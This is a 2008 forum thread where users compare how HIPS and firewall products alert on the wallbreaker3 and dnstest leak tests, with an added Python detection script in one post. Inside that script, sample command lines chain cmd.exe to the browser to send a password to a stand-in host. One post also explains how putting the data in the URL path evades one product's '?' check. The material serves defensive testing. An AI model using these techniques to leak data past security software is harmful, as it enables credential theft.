wallbreaker3, technical details

Discussion in 'other firewalls' started by alex_s, Mar 29, 2008.

Thread Status:
Not open for further replies.
  1. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    This should be not a very difficult test, but it is still interesting how differently HIPS pass it.

    The test can be found here:
    http://www.matousec.com/projects/security-software-testing-suite/

    What is of the most interest is command-line detection, because it allows 100% detection of suspicious activity at the very earliest stage.

    OA 2.1.0.119
     

    Attached Files: 1.gif, 2.gif, 3.gif
    Last edited: Mar 29, 2008
  2. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Hi Alex,

    Yes, interesting result.
    I've just tried Wallbreaker3 on Comodo with D+ activated and it appears there is no command line analysis carried out.

    On starting Wallbreaker3, there is a pop-up stating explorer.exe is trying to execute wallbreaker3.exe

    After clicking Allow to start the test, there is another pop-up stating that wallbreaker3.exe is trying to execute cmd.exe

    At this stage I guess Comodo is considered to have passed the test because you can block cmd.exe from executing.

    If you allow execution of cmd.exe, then a pop-up appears indicating iexplore.exe is trying to connect to internet.

    It appears there is no analysis of the command line parameters as in the case of OA.
     
  3. Coolio10

    Coolio10 Registered Member

    Joined:
    Sep 1, 2006
    Posts:
    1,124
    I see you read my post in the other thread before bluezanetti deleted it.
    Good :thumb: .

    Although it would be nice if you made the thread for several tests instead of just wallbreaker3.
     
  4. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks for the test! What about EQSecure?

    P.S. I saw it in your signature :)
     
  5. ggf31416

    ggf31416 Registered Member

    Joined:
    Aug 20, 2006
    Posts:
    314
    Location:
    Uruguay
    wallbreaker3.exe (from SSTS) does almost the same as wallbreaker test 3 (calling cmd.exe to call explorer.exe to start iexplore.exe) but there are some small differences:

    2 differences between the "old" wallbreaker test 3 and wallbreaker3.exe:
    * "old" WB3 causes an alert (comodo) about Service Control Manager (like almost every software :mad: ) but it doesn't affect the result of the test.
    * "old" WB3 creates a .bat file, matousec's WB3 does not
     
  6. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    He also deleted mine :)

    I see no probs with the other tests, but they are too numerous and it can get crowded. Some of them are almost duplicates. But first I'd really want to see info about other HIPS: EQSecure, ProSecurity, Outpost. I have two more tests to ask for, but only after cmdline processing becomes more clear.
     
  7. erreale

    erreale Registered Member

    Joined:
    May 2, 2004
    Posts:
    22

    EQS and Outpost pass the test in the same way as OA. First the launch of wallbreaker.exe is detected, then the attempt to start cmd.exe, then explorer.exe for opening the web page.
     
  8. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
  9. Nebulus

    Nebulus Registered Member

    Joined:
    Jan 20, 2007
    Posts:
    1,582
    Location:
    European Union
    I must confess, I'm not exactly sure about what this test's intention is. From what I saw in the source code, it attempts to download something from a site (matousec), and checks the downloaded data for a pattern. But if the data was sent, without any response, it also means that the firewall leaked.

    As for the command line parameters detection of OA, it seems that it finds that '?' to be suspicious. If I use an address like http://www.somesite.com/StolenPasswordIsHere instead of http://www.somesite.com/get.php?StolenPasswordIsHere OA will find nothing suspicious. Of course, in the first case I will get a 404 from www.somesite.com, but the data was sent.
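The distinction Nebulus draws above is the one a HIPS or EDR rule writer has to get right: a heuristic that keys only on a '?' in the URL misses the same payload carried in the URL path, while a rule that looks at the process ancestry (the wallbreaker3.exe -> cmd.exe -> explorer.exe -> iexplore.exe chain described earlier in the thread) flags both variants and leaves a user-launched browser alone. The following is an added example written for this page; it is not code from the thread, from Matousec's SSTS or from any of the HIPS products discussed. The event record format, the browser and shell name lists, the pid numbers and every command line are constructed assumptions, not captured logs; it generalizes the single case in the post to both the query-string and the path variant.

```python
"""Process-chain and command-line detection for the wallbreaker3 pattern.

Added example, not code from the thread, Matousec's SSTS or any HIPS vendor.
It runs two rules over constructed process-creation events: the weak
'?'-in-URL heuristic and an ancestry-aware rule that flags a browser started
with any URL argument when cmd.exe sits somewhere in its parent chain.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}   # assumed list
SHELLS = {"cmd.exe"}                                       # assumed list


@dataclass(frozen=True)
class ProcEvent:
    """One constructed process-creation record (assumed schema)."""
    pid: int
    ppid: int
    image: str      # base name of the executable, lower case
    cmdline: str    # full command line as seen at creation


def query_string_heuristic(cmdline: str) -> bool:
    """Weak rule: alert only if a URL on the command line carries a '?'.

    This is the behaviour described in the post above; a payload placed in
    the URL path instead of the query string slips past it.
    """
    return any("?" in url for url in URL_RE.findall(cmdline))


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
              max_depth: int = 8) -> List[ProcEvent]:
    """Walk the parent chain, nearest parent first; stop at unknown pids."""
    chain: List[ProcEvent] = []
    cur: Optional[ProcEvent] = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def chain_rule(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """Stronger rule: browser + URL argument + a shell in the ancestry.

    A user opening a link has explorer.exe as parent and no cmd.exe above
    it, so that benign case yields None regardless of what the URL contains.
    """
    if ev.image not in BROWSERS:
        return None
    urls = URL_RE.findall(ev.cmdline)
    if not urls:
        return None
    chain = ancestors(ev, by_pid)
    shell_idx = next((i for i, a in enumerate(chain) if a.image in SHELLS), None)
    if shell_idx is None:
        return None
    shell = chain[shell_idx]
    origin = by_pid.get(shell.ppid)
    origin_name = origin.image if origin else f"pid {shell.ppid}"
    # Report the segment from the program that invoked the shell down to the browser.
    segment = [a.image for a in reversed(chain[:shell_idx + 1])]
    path = " -> ".join([origin_name, *segment, ev.image])
    return f"{path} with URL {urls[0]}"


def scan(events: List[ProcEvent]) -> Dict[int, str]:
    """Apply chain_rule to every event; map flagged pid -> finding text."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, str] = {}
    for e in events:
        hit = chain_rule(e, by_pid)
        if hit:
            findings[e.pid] = hit
    return findings


# Constructed sample events (not captured logs): the query-string variant,
# the path variant the post says the '?' heuristic misses, and a benign
# user-launched browser whose URL happens to contain a '?'.
QS = "http://www.somesite.com/get.php?StolenPasswordIsHere"
PATH = "http://www.somesite.com/StolenPasswordIsHere"
SAMPLE_EVENTS = [
    ProcEvent(400, 300, "userinit.exe", "userinit.exe"),
    ProcEvent(1000, 400, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(2000, 1000, "wallbreaker3.exe", "wallbreaker3.exe"),
    ProcEvent(2001, 2000, "cmd.exe", f'cmd.exe /c start explorer.exe "{QS}"'),
    ProcEvent(2002, 2001, "explorer.exe", f'explorer.exe "{QS}"'),
    ProcEvent(2003, 2002, "iexplore.exe", f'iexplore.exe "{QS}"'),
    ProcEvent(3000, 1000, "wallbreaker3.exe", "wallbreaker3.exe"),
    ProcEvent(3001, 3000, "cmd.exe", f'cmd.exe /c start explorer.exe "{PATH}"'),
    ProcEvent(3002, 3001, "explorer.exe", f'explorer.exe "{PATH}"'),
    ProcEvent(3003, 3002, "iexplore.exe", f'iexplore.exe "{PATH}"'),
    ProcEvent(4000, 1000, "iexplore.exe", 'iexplore.exe "http://www.example.com/news.php?id=5"'),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        if e.image in SHELLS:
            print(f"pid {e.pid} '?' heuristic: {query_string_heuristic(e.cmdline)}")
    for pid, finding in scan(SAMPLE_EVENTS).items():
        print(f"ALERT pid {pid}: {finding}")
```

Running it shows the '?' heuristic firing on the first cmd.exe but not the second, while the ancestry rule flags both browser launches and ignores the benign one even though that URL contains a query string. The same cmd.exe-in-ancestry idea is what the "Cmd.exe start with new command" filter mentioned later in the thread captures at the shell layer.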
     
  10. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    There is room for improvement, of course. But my interest was of a different kind. The command line is not available in the kernel when NtCreateProcessEx is invoked. So it was interesting to know whether anybody cares about it at all.

    Great, almost everybody cares in one way or another. Then another interesting test: dnstest from the same pack. Almost every pack passes it, due to execution control. But then the test infects a launched process's entry point in a very interesting way. So the same question about it. What do I mean:
     

    Attached Files: 4.gif
  11. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Alex,

    I cannot seem to reproduce your final red pop-up message with the command line parameters.

    Is there any difference between AV+ version and non-AV+ version?
     
  12. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    As far as I know there should not be any difference in HIPS. AV only checks a file at startup against the virus base. To get a clear result, remove the exe from the program list before running.
     
  13. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Wallbreaker3 is definitely not in the program list. When I run wallbreaker3, I get 3 pop-ups but the third one is exactly the same as the second one and it is not red and there are no command line parameters.
     
  14. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Then this is to Mike, I think. Looks like a bug.
     
  15. ggf31416

    ggf31416 Registered Member

    Joined:
    Aug 20, 2006
    Posts:
    314
    Location:
    Uruguay
    Do you have the ssts.conf in the same folder as wallbreaker3.exe?
     
  16. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Yes it is.
    The program doesn't run correctly if it isn't.
     
  17. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    If you don't object, could you tell about EQSecure and dnstest? It's really very interesting.
     
  18. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Alex,

    Pop-ups by EQS/OA in response to dnstest.exe
    Program Guard in OA disabled.
     

    Attached Files: pu1.JPG, pu2.JPG, pu3.JPG
  19. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Please, guys. Can somebody test it with Outpost, Comodo, KIS, ProSecurity?
     
  20. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Which test? Wallbreaker3?

    These are the popups from ProSecurity after running Breakout3. I allowed all until IE attempted network access (not pictured).

    breakout3.JPG
     
  21. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    "Cmd.exe start with new command " by PS is something I see first time by a HIPS- seems a nice filter.

    Any other HIPS has such an option?
     
  22. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    First post on the thread shows OA actually showing the command line parameter.
     
  23. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks for wallbreaker3, but another interesting example is dnstest (not the old dnstester, but the new dnstest). The interesting point of dnstest is that it is two-layered. After the simple first level with an execution control alert, entry point infection happens.
     
  24. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Results of dnstest against PS:-

    dnstest01.jpg

    dnstest02.jpg

    dnstest03.jpg

    dnstest04.jpg
     
  25. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks, super. Prosecurity passed 100% :)
     